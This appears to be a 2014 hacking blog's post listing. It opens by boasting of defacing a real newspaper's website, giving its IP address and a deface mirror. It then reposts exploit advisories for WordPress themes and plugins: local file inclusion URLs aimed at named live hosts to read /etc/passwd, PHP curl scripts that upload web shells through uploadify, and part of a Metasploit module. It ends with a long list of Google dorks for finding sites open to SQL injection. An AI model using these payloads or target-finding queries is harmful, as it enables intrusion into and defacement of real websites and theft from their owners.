security

Kesserwen Al Asiya Newspaper website penetration testing

By |May 3rd, 2014|

Kesserwen Al Asiya Newspaper website penetration testing by 1337mir.
website: http://kesserwen.org/
ip: 192.217.123.88
date: 05-03-2014 09:36AM
deface page: http://kesserwen.org/1337mir.html
zone-h mirror: http://zone-h.net/mirror/id/22295807

contacted  them, but didn’t respond.

screenshot:

Comments Off on Kesserwen Al Asiya Newspaper website penetration testing

WordPress Theme LineNity LFI Vulnerability

By |April 15th, 2014|

exploit title: Local File Inclusion in WordPress Theme LineNity
Date: 13/04/2014
Google Dorks: inurl:wp-content/themes/linenity/
Risk: High
Author: Felipe Andrian Peixoto
Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803
Contact: [email protected]
Tested on: Windows 7 and Linux
Vulnerable File: download.php
Exploit :
http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ]
PoC:
http://www.moXm-o-tron.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php

http://sporX.ut.ee/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../..
/etc/passwd
http://lokXetpln.us.st//wp-content/themes/linenity/functions/download.php?imgurl=download.php

Comments Off on WordPress Theme LineNity LFI Vulnerability

Everything you need to know about the Heartbleed SSL bug

By |April 12th, 2014|

Massive. Huge. Catastrophic. These are all headlines I’ve seen today that basically say we’re now well and truly screwed when it comes to security on the internet. Specifically though, it’s this:
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software.
Every […]

Comments Off on Everything you need to know about the Heartbleed SSL bug

WP Barclaycart Plugins Arbitrary File Upload Vulnerability

By |March 18th, 2014|

exploit title: WP Barclaycart Plugins Arbitrary File Upload Vulnerability
Author: eX-Sh1Ne
Author Facebook: www.fb.me/ShiNe.gov
Date: 03-2014
GoogleDork: inurl:”wp-content/plugins/barclaycart”

Vulnerable location:

wp-content/plugins/barclaycart/uploadify/uploadify.php

Exploit :

< -?- php $uploadfile="Sh1Ne.php"; $ch = curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”,
‘folder’=>’/wp-content/plugins/barclaycart/uploadify/’));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
– ? ->

Shell Access :

http://localhost/wp-content/plugins/barclaycart/uploadify/Sh1Ne.php
or
http://localhost/wp-content/uploads/[years]/[month]/

Comments Off on WP Barclaycart Plugins Arbitrary File Upload Vulnerability

WP Plugins Premium Gallery Manager Arbitrary File Upload

By |March 18th, 2014|

exploit title: WP Plugins Premium Gallery Manager Arbitrary File Upload
Author: eX-Sh1Ne
Author Facebook: www.fb.me/ShiNe.gov
Date: 03-2014
GoogleDork: inurl:”wp-content/plugins/Premium_Gallery_Manager”

Vulnerable path:
site.com/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php

Exploit:

< -?- php $uploadfile="Sh1Ne.php.jpg"; $ch= curl_init("http://127.0.0.1:8080/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php"); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”,
‘folder’=>’/wp-content/plugins/Premium_Gallery_Manager/uploadify/’));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$postResult=curl_exec($ch);
curl_close($ch);
print”$postResult”;
? >

ShellAccess:

http://localhost:8080/wp-content/plugins/Premium_Gallery_Manager/uploadify/Sh1Ne.php.jpg
or
http://localhost:8080/wp-content/uploads/[years]/[month]/

Comments Off on WP Plugins Premium Gallery Manager Arbitrary File Upload

WordPress amerisale-re Remote file Upload Vulnerability

By |February 8th, 2014|

Exploit Title : WordPress amerisale-re Plugin Remote Shell Upload
Exploit Author : T3rm!nat0r5
Google Dork : inurl:/wp-content/plugins/amerisale-re
Vendor Homepage : http://wordpress.org/
Date : 2014/01/30
Tested on : Windows 8 , Linux
This module requires Metasploit: http//metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework

CoDE:

require ‘msf/core’
class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => ‘WordPress amerisale-re Plugin Remote
Shell Upload’,
‘Description’ => %q{
This module exploits an arbitrary […]

Comments Off on WordPress amerisale-re Remote file Upload Vulnerability

WordPress Dandelion Theme Shell Upload Vulnerability

By |February 8th, 2014|

Exploit Title: WordPress Dandelion Theme Shell Upload Vulnerability
Google Dork: inurl:/wp-content/themes/dandelion/
Date: 31/01/2014
Exploit Author: TheBlackMonster (Marouane)
Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
Software Link: Not Available
Version: Web Application
Tested on: Mozilla, Chrome, Opera -> Windows & Linux

CoDE:

< ? php $uploadfile="yourfile.php"; $ch = curl_init("http://127.0.0.1:8080/wp-content/themes/dandelion/functions/upload-handler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
? >

File Access :

http://127.0.0.1:8080/uploads/[years]/[month]/your_shell.php

Comments Off on WordPress Dandelion Theme Shell Upload Vulnerability

Google Dorks For SQL Injection

By |October 10th, 2013|

1500+ google Dorks for sql injection.
Definition of google dorks: Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site.

list below:

allinurl:*.php?txtCodiInfo=
inurl:read.php?=
inurl:”ViewerFrame?Mode=”
inurl:index.php?id=

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=

inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
intitle:axis intitle:”video server”
inurl:indexFrame.shtml Axis
?intitle:index.of? mp3 artist-name-here
“intitle:index of”
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
inurl:”id=” & intext:”Warning: mysql_fetch_array()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: […]

Comments Off on Google Dorks For SQL Injection